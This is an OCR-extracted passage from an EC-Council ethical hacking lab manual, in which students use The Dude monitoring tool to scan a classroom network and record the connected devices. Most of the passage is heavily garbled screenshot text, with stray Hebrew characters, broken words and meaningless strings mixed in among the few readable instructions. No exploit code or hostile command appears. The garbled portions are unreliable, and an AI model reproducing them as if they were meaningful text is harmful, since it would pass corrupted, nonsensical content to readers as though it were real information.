130245 13024C 13024S 130; 49 1302S0 130? 5? 130254 (302 K 130258 130340 130302 1303-03 13.03.06 130348 13.03.14 1303 16 13.03.20 130322 130324 1303 27
ו u2 u3 u a u 5 U c u 7 U fi U9 u10 u ו ו u12 u13 U14 U15 U •6 U ו7 u16 U19 U20 u
Co ׳not?Q Add's** Lilt(4 יי4י1ו !
Q *s»t״U□ Owl• r*1 LVvn.•**׳ Fto*
Q I undior•□ IMay /towns M U K»
<־ □ Logs £7 A=<10n £? Debug £7Ev«rf £? Stfog
ם Mb Me**
Crr«<t«J 0*rt «9 17kbpa/|x 1 I2kbp« S«nv־ a 3?4Ktv* ■» H ?*ten
a d^n^ioca lhost - The Dude 4,Obela3 ־ a *
® fafaenoee O toca s«n ־* ׳*״ ih ti rS S B S S X S A l_ ..L J U
Type, (* 3 M* f־ ־ ^i T ] □ יi l l lLv :c UiZ.-r'tn T׳,c«־> Mao100 a! j«-=le Local1000.12 incte Local10 0 0255 MTCfc LocalADVf, iincte LocalV/V2H9STOSG M-rle LocalWttOUMRSHL WCte LocalWHCSCI• SG1 w•*־־ LocalWIUJO0MI tncb Localw!H«5sr.c1u u-de Local
vmo LocalW K M W S8 M״| * Localw*C0w» *mcl* Local
o I GrtBfgj L‘Conterts
3 Address Usts £ AcJ-rriS
Q Ao-nlsgowns Q Devicw ׳!5 Fte»
Q Functor•Q Ktolciy Actons ם Lrk»
־1 ס 1יה״C7 AdenCf Oebuo r7Ev«4 L f S ^o fl CJ Mb r*d».
S f ln 0 ־9־׳ t2 l6 rp׳- * ■* ל2׳ל4ן »?Cflrr ׳x2 91 kbpa/ tx276bf>t
F I G U R E 1 8 .1 1 : S c a n n e d n e t w o r k c o m p le t e i n f o r m a t i o n
Eth ica l Hacking and Countermeasures Copyright C by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 263
M odule 03 - S can n in g N e tw o rk s
11. As described previously, you may select all die o ther options fro m the d rop-dow n lis t to v iew die respective in fo rm ation .
12. Once scanning is complete, c lick the bu tton to disconnect.
adm in© localhost - The Dude 4.0beta3
Fwfcwnooa 9 Local Sorvor *•to
jCtnas d ל• G' ”+ r ״ C . O k S*crgc Onoowf ״ Too* M \ *L ״.*• ,* [irkT
t> ,1 יW ikULYSSBKHQ IP WIN-D39NRSH1.91=4 ADMIN
75% tpu 2 2% IM fT t S0 % v.it 3 4% disk
י v י_ WIN-2N95T0SGIEM \ 1000
.1WM-LXQ\3\VR3!WM
R Address U8I8 £ AdnlrM□ Agert«□ Chate□ Gevcesr* =1«n F_racn8 Q History ActionsH Linlcs
= 3 Leg*C־f Acton (ZJ DcbuoEven!
O S/*log□ Mto NodooQ ISetwoifc Mips
r B - l gcjj< | 1■ j [ >
־ r ^־־ \־ T ־^ ה־רז ^ ^ל ־ר
nZ W k b w ' b 135 bps 5<?vrr r t i. 1 2 c p 5 ' t * 3 •15 *bps
FIGURE 18.12: Connection of systems in network
L a b A n a ly s isAnalyze and document die results related to die lab exercise.
T o o l /U t i l i t y In fo rm a t io n C o lle c te d /O b je c tiv e s A ch ie ve d
T h e D u d e
IP A dd ress R ange: 10.0.0.0 — 10.0.0.24
D e v ice N a m e P references: D N S , SN M P, N E T B IO S , IP
O u tp u t: L is t o f connected system, devices in N e tw o rk
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 264
M odule 03 - S can n in g N e tw o rk s
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONSRELATED TO THIS LAB.
In te rn e t C o n n e c tio n R e q u ire d
□ Yes 0 N o
P la tfo rm S upporte d
0 C lassroom 0 iLabs
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 265